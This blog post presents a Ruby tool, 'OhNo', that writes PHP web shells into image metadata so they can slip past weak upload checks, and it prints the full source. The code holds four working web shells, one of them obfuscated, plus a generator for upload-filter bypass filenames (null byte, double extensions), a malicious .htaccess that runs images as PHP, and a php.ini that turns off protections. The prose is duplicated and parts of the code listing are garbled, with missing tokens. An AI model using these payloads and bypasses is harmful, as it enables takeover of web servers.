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OhNo - The Evil Image Builder & Meta Manipulator
Today I would like to share a little something I made for fun. I previously made a posting on how to bypass general client side checks for uploading shells through open or administrative panels here, well my buddy decided to one up me with a even better posting which you can read here: In his write-up he talks about embedding PHP code within image tags to bypass weak server side checks which might be only using getimagesize() to verify it is a real image. In cases where this is beatable and there is no or minimal filename re-writing you can get creative as he outlines in his posting to get a shell. This method can also be very highly effective in exploiting include() type vulnerabilities with evil avatars as well! Anyways, he demonstrated things using a tool on Windows so I did some quick looking to see if I could replicate the functionalityt in Ruby, turns out you can :)
Mini_Exiftool to the rescue! As they describe it on their Github page "This library is a wrapper for the Exiftool command-line application ( written by Phil Harvey. You will get the full power of Exiftool to Ruby: Reading and writing of EXIF-data, IPTC-data and XMP-data." If you don't know anything about metatags, EXIF data or what I've been talking about then go check out the Exiftool site to read a bit more about it and how it works as it will help you understand whats going on under the hood.
For quick summary and the lazy, this tool can be used to read and dump the meta tags and meta values off of the files as well as remove and re-write the tag values in many cases. What all is in there? All kinds of random data can be found in the meta data, from manufacturer information from the device which took the picture or recording, to latitude and longitude of where a photo was taken, to who originally authored a document and when, contact info and emails even. There is a great amazing wealth of information available sometimes if you just look!
In our case we will be taking advantage of all that spare space as r0ng demonstrated to store (evil) PHP code in image files. I made a simple tool to leveraging the Mini_Exiftool gem to automate the process and make it a bit easier for the average user and because i felt like also making a small GUI for things (more fun with Tk bindings). You can find most of the Mini-Exiftool functionality covered in their tutorial, so I won't go over too much as I mostly just linked small functions shown there to fit the command line options parsed by optparse, not too much magic here. You can set options as arguments and run how you like or run in a GUI mode and do it all from there.
Help Menu:
Dump All Tags and associated Tag Values for file:
Write to Tag (it will try to create if it doesn't exist):
Dump after to confirm file write:
If you set the value to nothing and write it will remove the tag (& value):
Dump after to confirm:
I also created a nuke (-n) option which simply automates the above null write process to remove the tag. The Exiftool CLI and even the gem have more functionality to adjust timestamps and more subtle details, i kept it simple for now so mostly just string values for tags which are writable and hold string values. As a general rule of thumb the 'Comment' tag is almost always writable and/or can be created and written to. Perhaps in the future I will try to further extend to allow such functionality but for now it does what it needs to, embed PHP Shell code in images ;)
Embedding r0ng Shell from CLI:
Hex Dump to Confirm:
Bypass Uploader restrictions or new .htaccess (AddType application/x-httpd-php .png) as described in previous write-ups and then execute your shell in Browser:
I added a -u option which will help quickly build all possible upload filenames. I know i often tend to forget one or two when I do it 100% manually so this just helps me build a folder so I can then run through them all in hopes one will sneak past weak filters and checks.
Launch in GUI mode:
Embedding Sneaky Shell from GUI:
I only tested it with image files as that was my main target but i do believe you should be able to also use the general viewing, deleting and writing with any file Exiftool would support (i.e. PDF, Word, Excel, etc). The CeWL password list generator tool is another Ruby project which leverages Meta data to help profile corporate targets for password auditing purposes, read more about that project here. Please let me know how things work for you and how else this might be useful to you so I can try to improve as time allows.
DOWNLOAD: Zip File w/Gemfile, Both Source Files, and a few Sample Images:DOWNLOAD
Getting things working:
Ruby TK Bindings Needed for GUI Support:
COMMAND: apt-get install tk libtk-ruby
If require 'tkextlib/tile' throws in `require': TkPackage can't find package tile (RuntimeError)
COMMANDS: teacup install tile
ExifTool CLI Installation:
Source Code for Full All in One, also outlined below (CLI & GUI): SOURCE
Source Code for Standalone CLI Version (NO GUI): SOURCE
Raw All in One Code:
Hope this is helpful to someone out there....
Until next time, Enjoy!
Mini_Exiftool to the rescue! As they describe it on their Github page "This library is a wrapper for the Exiftool command-line application ( written by Phil Harvey. You will get the full power of Exiftool to Ruby: Reading and writing of EXIF-data, IPTC-data and XMP-data." If you don't know anything about metatags, EXIF data or what I've been talking about then go check out the Exiftool site to read a bit more about it and how it works as it will help you understand whats going on under the hood.
For quick summary and the lazy, this tool can be used to read and dump the meta tags and meta values off of the files as well as remove and re-write the tag values in many cases. What all is in there? All kinds of random data can be found in the meta data, from manufacturer information from the device which took the picture or recording, to latitude and longitude of where a photo was taken, to who originally authored a document and when, contact info and emails even. There is a great amazing wealth of information available sometimes if you just look!
In our case we will be taking advantage of all that spare space as r0ng demonstrated to store (evil) PHP code in image files. I made a simple tool to leveraging the Mini_Exiftool gem to automate the process and make it a bit easier for the average user and because i felt like also making a small GUI for things (more fun with Tk bindings). You can find most of the Mini-Exiftool functionality covered in their tutorial, so I won't go over too much as I mostly just linked small functions shown there to fit the command line options parsed by optparse, not too much magic here. You can set options as arguments and run how you like or run in a GUI mode and do it all from there.
Help Menu:
Dump All Tags and associated Tag Values for file:
Write to Tag (it will try to create if it doesn't exist):
Dump after to confirm file write:
If you set the value to nothing and write it will remove the tag (& value):
Dump after to confirm:
I also created a nuke (-n) option which simply automates the above null write process to remove the tag. The Exiftool CLI and even the gem have more functionality to adjust timestamps and more subtle details, i kept it simple for now so mostly just string values for tags which are writable and hold string values. As a general rule of thumb the 'Comment' tag is almost always writable and/or can be created and written to. Perhaps in the future I will try to further extend to allow such functionality but for now it does what it needs to, embed PHP Shell code in images ;)
Embedding r0ng Shell from CLI:
Hex Dump to Confirm:
Bypass Uploader restrictions or new .htaccess (AddType application/x-httpd-php .png) as described in previous write-ups and then execute your shell in Browser:
I added a -u option which will help quickly build all possible upload filenames. I know i often tend to forget one or two when I do it 100% manually so this just helps me build a folder so I can then run through them all in hopes one will sneak past weak filters and checks.
Launch in GUI mode:
Embedding Sneaky Shell from GUI:
I only tested it with image files as that was my main target but i do believe you should be able to also use the general viewing, deleting and writing with any file Exiftool would support (i.e. PDF, Word, Excel, etc). The CeWL password list generator tool is another Ruby project which leverages Meta data to help profile corporate targets for password auditing purposes, read more about that project here. Please let me know how things work for you and how else this might be useful to you so I can try to improve as time allows.
DOWNLOAD: Zip File w/Gemfile, Both Source Files, and a few Sample Images:DOWNLOAD
Getting things working:
Ruby TK Bindings Needed for GUI Support:
COMMAND: apt-get install tk libtk-ruby
If require 'tkextlib/tile' throws in `require': TkPackage can't find package tile (RuntimeError)
COMMANDS: teacup install tile
ExifTool CLI Installation:
- Download file, run commands:
- cd <your download directory>
- gzip -dc Image-ExifTool-#.##.tar.gz | tar -xf -
- cd Image-ExifTool-#.##/
- perl Makefile.PL
- make test
- sudo make install
- wget
- unzip
- cd OhNo/
- bundle install
- ./ohno -h
Source Code for Full All in One, also outlined below (CLI & GUI): SOURCE
Source Code for Standalone CLI Version (NO GUI): SOURCE
Raw All in One Code:
- #!/usr/bin/env ruby
- #
- # OhNo - Evil Image Builder
- # A Ruby ExifTool GUI of sorts
- # By: Hood3dRob1n
- #
- # Pic:
- # Beta:
- #
- # Pre-Requisites:
- # apt-get install tk libtk-ruby
- # if require 'tkextlib/tile' throws in `require': TkPackage can't find package tile (RuntimeError)
- # => teacup install tile
- #
- # MiniExifTool is a wrapper for ExifTool CLI
- # ExifTool CLI Installation:
- # Download file...
- # cd <your download directory>
- # gzip -dc Image-ExifTool-#.##.tar.gz | tar -xf -
- # cd Image-ExifTool-#.##/
- # perl Makefile.PL
- # make test
- # sudo make install
- #
- ####### STD GEMS #########
- require 'fileutils' #
- require 'optparse' #
- ###### NON-STD GEMS ######
- require 'mini_exiftool' #
- require 'tk' #
- require 'tkextlib/tile' #
- require 'colorize' #
- ##########################
- HOME=File.expand_path(File.dirname(__FILE__))
- EVIL=HOME + '/evil/'
- UP = EVIL + 'uploads/'
- # Terminal Banner
- def banner
- puts
- print <<"EOT".white
- _______________________________
- < OhNo - The Evil Image Builder >
- -------------------------------
- \\ __
- \\ (OO)
- \\ ( )
- \\ /--\\
- __ / \\ \\
- UOOU\\.'@@@@@@`.\\ )
- \\__/(@@@@@@@@@@) /
- (@@@@@@@@)((
- `YY~~~~YY' \\\\
- || || >>
- end
- # Clear Terminal
- def cls
- if RUBY_PLATFORM =~ /win32|win64|\.NET|windows|cygwin|mingw32/i
- system('cls')
- else
- system('clear')
- end
- end
- # Delete MetaTag Value
- # Returns True on Success, False otherwise
- def delete(obj, tag)
- if not obj.tags.include?(tag)
- return false
- else
- obj[tag] = '' # Set to Nothing to Wipe Tag
- if
- return true
- else
- return false
- end
- end
- end
- # Write String to Tag
- # Returns True on Success, False otherwise
- def write(obj, str, tag)
- obj[tag] = str
- if
- return true
- else
- return false
- end
- end
- # Dump Tags & Values
- # Returns Hash {Tag=>Value}
- def dump(obj)
- tagz={}
- obj.tags.sort.each do |tag|
-, obj[tag])
- end
- return tagz
- end
- # Build various Shell Upload Bypass Possibilities
- # Generates many possibilities and writes them to: OhNo/evil_images/uploads/
- def generate_uploads(shell, flip='gif')
- Dir.mkdir(EVIL) unless File.exists?(EVIL) and
- Dir.mkdir(UP) unless File.exists?(UP) and
- php = [ 'php', 'pHp', 'php4', 'php5', 'phtml' ]
- options = [ 'gif', 'jpeg', 'mp3', 'pdf', 'png', 'txt' ]
- shell_name = shell.split('/')[-1]
- # Read provided Shell into Var
- data =
- # Generate our Shell Possibilities for Uploading
- php.each do |x|
- a = shell_name.sub(shell.split('/')[-1].split('.')[-1], x)
- f = + a, 'w+')
- f.puts data
- f.close
- end
- options.each do |y|
- # Simple Concatenation of Filetypes: .php.jpeg
- b = shell_name.sub(shell.split('/')[-1].split('.')[-1], shell.split('/')[-1].split('.')[-1] + '.' + y)
- f = + b, 'w+')
- f.puts data
- f.close
- if y =~ /GIF|JPEG|PNG/i
- # Simple Concatenation of Filetypes (reversed order for evil images): .jpeg.php
- c = shell_name.sub(shell.split('/')[-1].split('.')[-1], y +'.' + shell.split('/')[-1].split('.')[-1])
- f = + c, 'w+')
- f.puts data
- f.close
- end
- # Another Concatenation of Filetypes in hopes it drops the trailing type: .php;jpeg
- d = shell_name.sub(shell.split('/')[-1].split('.')[-1], shell.split('/')[-1].split('.')[-1] + ';.' + y)
- f = + d, 'w+')
- f.puts data
- f.close
- # Null Byte to drop the trailing filetype
- e = shell_name.sub(shell.split('/')[-1].split('.')[-1], shell.split('/')[-1].split('.')[-1] + '%00.' + y)
- f = + e, 'w+')
- f.puts data
- f.close
- end
- # Bogus separator, unknown extension causes it to fallback to PHP
- g = shell_name.sub(shell.split('/')[-1].split('.')[-1], shell.split('/')[-1].split('.')[-1] + '.xxxfoo')
- f = + g, 'w+')
- f.puts data
- f.close
- # Create .htaccess file for flipping filetype to php
- f = + '.htaccess', 'w+')
- f.puts "AddType application/x-httpd-php .#{flip}"
- f.close
- # PHP_INI Overrides
- f = + 'php.ini', 'w+')
- f.puts 'disable_functions = none'
- f.puts 'magic_quotes_gpc = off'
- f.puts 'safe_mode = off'
- f.puts 'suhosin.executor.func.blacklist = foofucked'
- f.close
- end
- # PHP Shells for Evil Image Builder
- # see more on sneaky shell here:
- sneaky_shell = '<?php @$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_; $_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__]; $_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] ); $_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] ); $_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ]; $_=$ $_[$__+ $__] ;$_[@-_]($_[@!+_] );?>'
- r0ng_shell = "<?if($_GET['r0ng']){echo'<pre>'.shell_exec($_GET['r0ng']);}?>"
- system_shell = "<?error_reporting(0);print(___);system($_REQUEST[cmd]);print(___);die;?>"
- eval_shell = "<?error_reporting(0);print(___);eval($_REQUEST[cmd]);print(___);die;?>"
- $shell='Sneaky Shell'
- $c=1
- ########### Start DaGUI ###################
- # Start Root --
- root =
- root.title = "OhNo!"
- root.height = 900
- root.width = 1200
- # root['resizable'] = false, false
- root.background = 'grey'
- # End Root --
- # Start Frames --
- # Top Frame
- top_frame = do
- height 25
- width 1200
- background 'green'
- pack('side' => 'top', 'fill' => 'x', 'anchor' => 's')
- end
- # Bttom Frame
- bottom_frame = do
- background 'grey'
- pack('side' => 'bottom', 'fill' => 'both', 'expand'=> true)
- end
- # Left Frame
- left_frame = do
- height 175
- width 210
- background 'grey'
- pack('side' => 'left', 'fill' => 'both', 'anchor' => 'se')
- end
- # Right Frame
- right_frame = do
- background 'grey'
- pack('side' => 'right', 'fill' => 'both', 'anchor' => 'sw','expand'=> true)
- end
- # End Frames --
- # Start Labels --
- # Main Greeting Label
- greeting_label = do
- padx 10;
- pady 6;
- foreground 'black'
- background 'grey'
- font'family' => 'times', 'size' => 14, "weight" =>'bold')
- text 'The Meta Manipulator'
- end
- greeting_label.pack('fill' => 'both')
- right_rfill_label = do
- padx 10;
- pady 6;
- foreground 'black'
- background 'grey'
- end
- right_rfill_label.pack('side' => 'right', 'fill' => 'y')
- bottom_lfill_label = do
- padx 10;
- pady 6;
- foreground 'black'
- background 'grey'
- end
- bottom_lfill_label.pack('side' => 'left', 'fill' => 'y')
- bottom_rfill_label = do
- padx 10;
- pady 6;
- foreground 'black'
- background 'grey'
- end
- bottom_rfill_label.pack('side' => 'right', 'fill' => 'y')
- bottom_bfill_label = do
- padx 6;
- pady 6;
- foreground 'black'
- background 'grey'
- end
- bottom_bfill_label.pack('side' => 'bottom', 'fill' => 'x')
- # OhNo Image Label
- $img_file = "#{HOME}/images/ohno.gif"
- image =
- image.file = $img_file
- image_label =
- image_label.image = image
- image_label.relief = 'groove'
-'height' => image.height, 'width' => image.width,'x' => 25, 'y' => 10)
- # Loaded Image Label
- loaded_label = do
- padx 10;
- pady 5;
- foreground 'black'
- background 'grey'
- # height 25
- # width 100
- font'family' => 'times', 'size' => 12, "weight" =>'bold')
- text "Currently Loaded: #{$img_file.to_s.split('/')[-1]}"
- end
-'x' => 10, 'y' => 10)
- enter_tag_label = do
- padx 10;
- pady 5;
- foreground 'black'
- background 'grey'
- font'family' => 'times', 'size' => 12, "weight" =>'bold')
- text "Enter Tag Name"
- end
-'x' => 40, 'y' => 95)
- # End Labels --
- # Start Tree --
- tree =
- tree['columns'] = 'Tag Value'
- tree.selectmode = 'extended'
- tree.height = 10
- tree.column_configure( 0, :width => 300, :anchor => 'center','stretch' => true)
- tree.heading_configure( 0, :text => 'Tag Name')
- tree.column_configure( 1, :width => 300, :anchor => 'center','stretch' => true)
- tree.heading_configure( 1, :text => 'Value')
- # Test Value for load.....
- img_name =
- img_name = HOME + '/images/ohno.gif'
- $photo =
- count=0
- entries = dump($photo)
- entries.each do |tag, value|
- if count.to_i > 0
- tree.insert( 'img', 'end', :values => [tag, value])
- else
- tree.insert('', 0, :id => 'img', :text => img_name, :values =>[tag, value])
- count = count.to_i + 1
- end
- end
- tree.itemconfigure('img', 'open', true);
- tree_yscrollbar = do
- pack('side'=>'right','fill'=>'y')
- end
- tree_xscrollbar = do
- pack('side'=>'bottom','fill'=>'x')
- end
- tree.yscrollbar(tree_yscrollbar);
- tree.xscrollbar(tree_xscrollbar);
- tree.pack('side' => 'bottom', 'fill' => 'both', 'expand'=> true)
- # End Tree --
- # Tag Results Label
- tags_label = do
- padx 10;
- pady 6;
- foreground 'black'
- background 'grey'
- font'family' => 'times', 'size' => 12, "weight" =>'bold')
- text 'Currently Available Tags & Associated Values'
- end
- tags_label.pack('side' => 'top', 'fill' => 'x')
- # Start Input Boxes --
- # Tag Name input
- tag_input = { background 'white'; justify'center'; relief 'sunken' }
- tag_var =
- tag_input.textvariable = tag_var
- tag_var.value = 'Comment'
-'height' => 25, 'width' => 200, 'x' => 10, 'y' =>140)
- # Write String input
- write_input = { background 'white'; justify'center'; relief 'sunken' }
- write_var =
- write_input.textvariable = write_var
- write_var.value = 'Custom String or Cool Code Here'
-'height' => 25, 'width' => 235, 'x' => 270, 'y' =>110)
- # End Input Boxes --
- # Start ComboBox --
- # Shell Options Drop Down
- shell_entries =
- combobox = { textvariable shell_entries; justify 'center'; }
- combobox.values = [ 'Sneaky Shell', 'r0ng Shell', 'System Shell','Eval Shell', "I'm Using Custom String" ]
- combobox.state = 'readonly'
- combobox.set('--+Select Shell+--')
-'height' => 25, 'width' => 240, 'x' => 270, 'y' =>45)
- combobox.bind("<ComboboxSelected>") { $shell = combobox.get; puts"Shell Option set to".light_blue + ": #{$shell}".white }
- # End ComboBox --
- # Start Buttons --
- # Import New Image Button
- import_btn = do
- font'family' => 'times', 'size' => 10, "weight" =>'bold')
- text "Import New Image"
- borderwidth 3
- relief "groove"
- padx 45;
- pady 5;
- command proc {
- #user supplies image file to read into variable
- begin
- $img_file = Tk::getOpenFile :initialdir => "#{HOME}/images/",:initialfile => 'ohno.gif', :title => 'Select Image File to Import'
- img_name = $img_file.to_s.split('/')[-1]
- $photo =$img_file)
- count=0
- # Dump Info from new file
- entries = dump($photo)
- # Clear the current image content
- tree.detach "img" if $c.to_i <= 1
- tree.detach "img#{$c.to_i - 1}" if $c.to_i > 1
- # Refill it now
- entries.each do |tag, value|
- if count.to_i > 0
- tree.insert( "img#{$c}", 'end', :values => [tag, value])
- else
- tree.delete
- tree.insert('', 0, :id => "img#{$c}", :text => img_name,:values => [tag, value])
- tree.itemconfigure("img#{$c}", 'open', true);
- count = count.to_i + 1
- end
- end
- $c = $c.to_i + 1
- puts "Image Changed to".light_blue + ": #{$img_file.to_s.split('/')[-1]}".white
- loaded_label.configure('text'=>"Currently Loaded: #{$img_file.to_s.split('/')[-1]}");
- rescue
- puts 'Problem Importing Image File'.light_red + '!'.white
- Tk::messageBox(:message => 'Problem Importing Image File!',:title => 'Epic Fail!');
- end
- }
- end
-'x' => 10, 'y' => 45)
- # Delete Button
- delete_btn = do
- font'family' => 'times', 'size' => 11, "weight" =>'bold')
- text 'Delete Tag/Value'
- padx 60;
- pady 0;
- borderwidth 3
- relief "groove"
- command proc {
- tag_name = tag_input.get.to_s.strip
- if delete($photo, tag_name)
- $photo.reload
- count=0
- # Dump Info from new file
- entries = dump($photo)
- # Clear the current image content
- tree.detach "img" if $c.to_i <= 1
- tree.detach "img#{$c.to_i - 1}" if $c.to_i > 1
- # Refill it now
- entries.each do |tag, value|
- if count.to_i > 0
- tree.insert( "img#{$c}", 'end', :values => [tag, value])
- else
- tree.delete
- tree.insert('', 0, :id => "img#{$c}", :text => img_name,:values => [tag, value])
- tree.itemconfigure("img#{$c}", 'open', true);
- count = count.to_i + 1
- end
- end
- $c = $c.to_i + 1
- puts "Deletion Complete".light_blue + "!".white
- puts "Reloaded".light_blue + ": #{$img_file.to_s.split('/')[-1]}".white
- loaded_label.configure('text'=>"Currently Loaded: #{$img_file.to_s.split('/')[-1]}");
- Tk::messageBox(:message => "#{tag_name} tag data deleted! Reload image to confirm....", :title => 'MetaWipe');
- else
- Tk::messageBox(:message => "Problem deleting #{tag_name} tag! Check tag exists, is spelling correctly, is writable and then try again.....", :title => 'MetaWipe Failure');
- end
- }
- end
-'x' => 270, 'y' => 10)
- # Shell Write Button
- shell_write_btn = do
- font'family' => 'times', 'size' => 11, "weight" =>'bold')
- text 'Write Shell to Tag'
- padx 55;
- pady 0;
- borderwidth 3
- relief "groove"
- command proc {
- tag_name = tag_input.get.to_s.strip
- shell_name = combobox.get.to_s.strip
- good=false
- case shell_name
- when 'System Shell'
- good=true
- payload = system_shell
- c = "http://localhost/forum/profile.php?inc=/profiles/0123456789/#{$img_file.split('/')[-1]}?cmd=id"
- when 'Eval Shell'
- good=true
- payload = eval_shell
- c = "http://localhost/#{$img_file.to_s.split('/')[-1]}?cmd=system('id');"
- when 'Sneaky Shell'
- good=true
- payload = sneaky_shell
- c = "http://localhost/#{$img_file.split('/')[-1]}?0=system&1=id"
- when 'r0ng Shell'
- good=true
- payload = r0ng_shell
- c = "http://localhost/#{$img_file.split('/')[-1]}?r0ng=id"
- else
- good=false
- Tk::messageBox(:message => "No Shell Selected! \nSelect a valid Shell Option or try the other button....", :title => 'OhNo - Epic Failure!');
- end
- if good
- tmp = HOME + '/temp'
- Dir.mkdir(EVIL) unless File.exists?(EVIL) and
- Dir.mkdir(tmp) unless File.exists?(tmp) and
- real =$img_file)
- innocent = tmp + '/' + $img_file.split('/')[-1]
- FileUtils.copy_file($img_file, innocent, preserve = true)
- Dir.chdir(tmp) do
- photo =$img_file.split('/')[-1])
- v = photo.exiftool_version.to_s.split('.')
- height = photo.image_height
- width = photo.image_width
- puts
- puts "ExifTool v#{v[0]}".light_red + ".".white + "#{v[1]}".light_red
- puts
- if not real.tags.include?(tag_name)
- puts "Provided Tag doesn't appear to exist".light_red +"!".white
- Tk::messageBox(:message => "#{tag_name} doesn't apear to exist! Try generic tag....", :title => 'Warning!');
- if real.tags.include?('Comment')
- puts "Trying generic approach to try and write to 'Comment' Tag".light_yellow + ".....".white
- tag_name = 'Comment'
- else
- puts "Trying generic approach to create and write to Comment Tag".light_yellow + ".....".white
- tag_name = 'Comment'
- end
- end
- original = photo[tag_name]
- puts "Attempting to write ".light_blue + "'".white + "#{shell_name}".light_blue + "'".white + " to the ".light_blue +"'".white + "#{tag_name}".light_blue + "'".white + " tag".light_blue+ "....".white
- puts "Current Value".light_blue + ": #{original}".white
- puts "Write String".light_blue + ": \n#{payload}".white
- puts
- if write(photo, payload, tag_name)
- photo.reload
- count=0
- if original != photo[tag_name]
- $photo = photo
- FileUtils.copy_file($img_file.split('/')[-1], "#{EVIL}/#{$img_file.split('/')[-1]}", preserve = true)
- # Dump Info from new file
- entries = dump($photo)
- # Clear the current image content
- tree.detach "img" if $c.to_i <= 1
- tree.detach "img#{$c.to_i - 1}" if $c.to_i > 1
- # Refill it now
- entries.each do |tag, value|
- if count.to_i > 0
- tree.insert( "img#{$c}", 'end', :values => [tag, value])
- else
- tree.delete
- tree.insert('', 0, :id => "img#{$c}", :text =>img_name, :values => [tag, value])
- tree.itemconfigure("img#{$c}", 'open', true);
- count = count.to_i + 1
- end
- end
- $c = $c.to_i + 1
- puts
- Tk::messageBox(:message => "#{shell_name} written successfully! \nFind your evil image here: #{EVIL}#{$img_file.split('/')[-1]}\nTo execute: #{c}", :title => 'OhNo - Evil Image Success!');
- puts "Appears things were successful".light_green +"!".white
- puts "Updated Value".light_green + ": #{photo[tag_name]}".white
- puts "Find your evil image here".light_green + ": #{EVIL}#{$img_file.split('/')[-1]}".white
- puts "Example #{shell_name} Shell Execution".light_green+ ": #{c}".white
- else
- Tk::messageBox(:message => "Problem writing to #{tag_name}! \nMake sure Tag name exists, is spelled properly, is writable and then try again....", :title => 'OhNo - Epic Failure!');
- puts "WTF".light_red + "?".white + " Doesn't appear we changed the value".light_red + ".....".white
- puts "Value".light_yellow + ": #{photo[tag_name]}".white
- puts "Make sure Tag name was spelled properly, is writable and try again".light_red + "...".white
- end
- else
- Tk::messageBox(:message => "Problem writing to #{tag_name}! \nMake sure Tag name exists, is spelled properly, is writable and then try again....", :title => 'OhNo - Epic Failure!');
- puts "Problem writing to '#{tag_name}' Tag".light_red +"!".white
- puts "Make sure Tag name exists, is spelled properly, is writable and then try again".light_red + "...".white
- end
- end
- FileUtils.rm_rf(tmp)
- end
- }
- end
-'x' => 270, 'y' => 75)
- # String Write Button
- string_write_btn = do
- font'family' => 'times', 'size' => 11, "weight" =>'bold')
- text 'Write String to Tag'
- padx 50;
- pady 0;
- borderwidth 3
- relief "groove"
- command proc {
- good=false
- tag_name = tag_input.get.to_s.strip
- str = write_input.get.to_s.strip
- if str != 'Custom String or Cool Code Here'
- good=true
- end
- if good
- tmp = HOME + '/temp'
- Dir.mkdir(EVIL) unless File.exists?(EVIL) and
- Dir.mkdir(tmp) unless File.exists?(tmp) and
- real =$img_file)
- innocent = tmp + '/' + $img_file.split('/')[-1]
- FileUtils.copy_file($img_file, innocent, preserve = true)
- Dir.chdir(tmp) do
- photo =$img_file.split('/')[-1])
- v = photo.exiftool_version.to_s.split('.')
- height = photo.image_height
- width = photo.image_width
- puts
- puts "ExifTool v#{v[0]}".light_red + ".".white + "#{v[1]}".light_red
- puts
- if not real.tags.include?(tag_name)
- puts "Provided Tag doesn't appear to exist".light_red +"!".white
- Tk::messageBox(:message => "#{tag_name} doesn't apear to exist! Try generic tag....", :title => 'Warning!');
- if real.tags.include?('Comment')
- puts "Trying generic approach to try and write to 'Comment' Tag".light_yellow + ".....".white
- tag_name = 'Comment'
- else
- puts "Trying generic approach to create and write to Comment Tag".light_yellow + ".....".white
- tag_name = 'Comment'
- end
- end
- original = photo[tag_name]
- puts "Attempting to write to the ".light_blue + "'".white +"#{tag_name}".light_blue + "'".white + " tag".light_blue +"....".white
- puts "Current Value".light_blue + ": #{original}".white
- puts "Write String".light_blue + ": \n#{str}".white
- puts
- if write(photo, str, tag_name)
- photo.reload
- count=0
- if original != photo[tag_name]
- $photo = photo
- FileUtils.copy_file($img_file.split('/')[-1], "#{EVIL}/#{$img_file.split('/')[-1]}", preserve = true)
- # Dump Info from new file
- entries = dump($photo)
- # Clear the current image content
- tree.detach "img" if $c.to_i <= 1
- tree.detach "img#{$c.to_i - 1}" if $c.to_i > 1
- # Refill it now
- entries.each do |tag, value|
- if count.to_i > 0
- tree.insert( "img#{$c}", 'end', :values => [tag, value])
- else
- tree.delete
- tree.insert('', 0, :id => "img#{$c}", :text =>$img_file.split('/')[-1], :values => [tag, value])
- tree.itemconfigure("img#{$c}", 'open', true);
- count = count.to_i + 1
- end
- end
- $c = $c.to_i + 1
- puts
- Tk::messageBox(:message => "Custom String written successfully! \nFind your evil image here: #{EVIL}#{$img_file.split('/')[-1]}", :title => 'OhNo - Evil Image Success!');
- puts "Appears things were successful".light_green +"!".white
- puts "Updated Value".light_green + ": #{photo[tag_name]}".white
- puts "Find your evil image here".light_green + ": #{EVIL}#{$img_file.split('/')[-1]}".white
- else
- Tk::messageBox(:message => "Problem writing to #{tag_name}! \nMake sure Tag name exists, is spelled properly, is writable and then try again....", :title => 'OhNo - Epic Failure!');
- puts "WTF".light_red + "?".white + " Doesn't appear we changed the value".light_red + ".....".white
- puts "Value".light_yellow + ": #{photo[tag_name]}".white
- puts "Make sure Tag name was spelled properly, is writable and try again".light_red + "...".white
- end
- else
- Tk::messageBox(:message => "Problem writing to #{tag_name}! \nMake sure Tag name exists, is spelled properly, is writable and then try again....", :title => 'OhNo - Epic Failure!');
- puts "Problem writing to '#{tag_name}' Tag".light_red +"!".white
- puts "Make sure Tag name exists, is spelled properly, is writable and then try again".light_red + "...".white
- end
- end
- FileUtils.rm_rf(tmp)
- end
- }
- end
-'x' => 270, 'y' => 140)
- # End Buttons --
- ############ End DaGUI ####################
- ### MAIN ### ##
- ##################################### #
- options = {}
- optparse = do |opts|
- opts.banner = "Usage".light_blue + ": #{$0} ".white + "[".light_blue + "OPTIONS".white + "]".light_blue
- opts.separator ""
- opts.separator "EX".light_blue + ": #{$0} -x".white
- opts.separator "EX".light_blue + ": #{$0} -i ./images/ohno.jpeg -d".white
- opts.separator "EX".light_blue + ": #{$0} -i ./images/ohno.gif -g 1 -t Comment".white
- opts.separator "EX".light_blue + ": #{$0} -i ./images/ohno.gif -w 'HR was here' -t 'Comment'".white
- opts.separator ""
- opts.separator "Options".light_blue + ": ".white
- opts.on('-x', '--start-gui', "\n\tStart OhNo in GUI mode".white)do |blah|
- options[:method] = 0
- end
- opts.on('-i', '--image IMG', "\n\tImage File to Use".white) do|img|
- if File.exists?(img.chomp) and not
- options[:img] = img.chomp
- else
- cls
- banner
- puts
- puts "Problem loading Image file".light_red + "!".white
- puts "Check path and permissions and try again".light_red +".....".white
- puts
- puts opts
- puts
- exit 666;
- end
- end
- opts.on('-d', '--dump', "\n\tDump All Tags w/Values".white) do|meh|
- options[:method] = 1
- end
- opts.on('-w', '--write STRING', "\n\tWrite Custom String to Tag".white) do |write_str|
- options[:method] = 2
- options[:str] = write_str.chomp
- end
- opts.on('-g', '--generate NUM', "\n\tWrite PHP Shell to Tag\n\t 0 => Sneaky Shell\n\t 1 => r0ng Shell\n\t 2 => Simple System() Shell\n\t 3 => Simple Eval Shell".white) do |num|
- options[:method] = 3
- if num.chomp.to_i >= 0 and num.chomp.to_i <= 3
- options[:shell] = num.chomp.to_i
- else
- cls
- banner
- puts
- puts "Unknown Shell Generator Option Requested".light_red +"!".white
- puts
- puts opts
- puts
- exit 69;
- end
- end
- opts.on('-t', '--tag TAG', "\n\tTag Name to Write to".white) do|tag|
- options[:tag] = tag.chomp
- end
- opts.on('-n', '--nuke TAG', "\n\tTry to Delete Tag".white) do|tag|
- options[:method] = 4
- options[:tag] = tag.chomp
- end
- opts.on('-u', '--uploads-gen SHELL', "\n\tGenerate Upload Bypass Possibilities for Shell".white) do |shell|
- if File.exists?(shell.chomp) and not
- options[:method] = 5
- options[:shell] = shell.chomp
- else
- cls
- banner
- puts
- puts "Problem loading Shell file".light_red + "!".white
- puts "Check path and permissions and try again".light_red +".....".white
- puts
- puts opts
- puts
- exit 69;
- end
- options[:shell] = shell.chomp
- end
- opts.on('-h', '--help', "\n\tHelp Menu".white) do
- cls
- banner
- puts
- puts opts
- puts
- exit 69;
- end
- end
- begin
- foo = ARGV[0] || ARGV[0] = "-h"
- optparse.parse!
- if options[:method].to_i == 0
- mandatory = [:method] # GUI Mode
- elsif options[:method].to_i == 1
- mandatory = [:method, :img] # CLI DUMP
- elsif options[:method].to_i == 3
- mandatory = [:method, :img, :tag, :shell] # CLI Evil Image Generator
- elsif options[:method].to_i == 5
- mandatory = [:method, :shell] # CLI DUMP
- elsif not options[:generate].nil?
- mandatory = [:method, :img] # CLI DUMP
- else
- mandatory = [:method, :img, :tag] # CLI WRITE OR NUKE
- end
- missing ={ |param| options[param].nil? }
- if not missing.empty?
- cls
- banner
- puts
- puts "Missing options".light_red + ": #{missing.join(', ')}".white
- puts optparse
- exit 666;
- end
- rescue OptionParser::InvalidOption, OptionParser::MissingArgument
- cls
- banner
- puts
- puts $!.to_s
- puts
- puts optparse
- puts
- exit 666;
- end
- cls
- banner
- case options[:method].to_i
- when 0
- # GUI
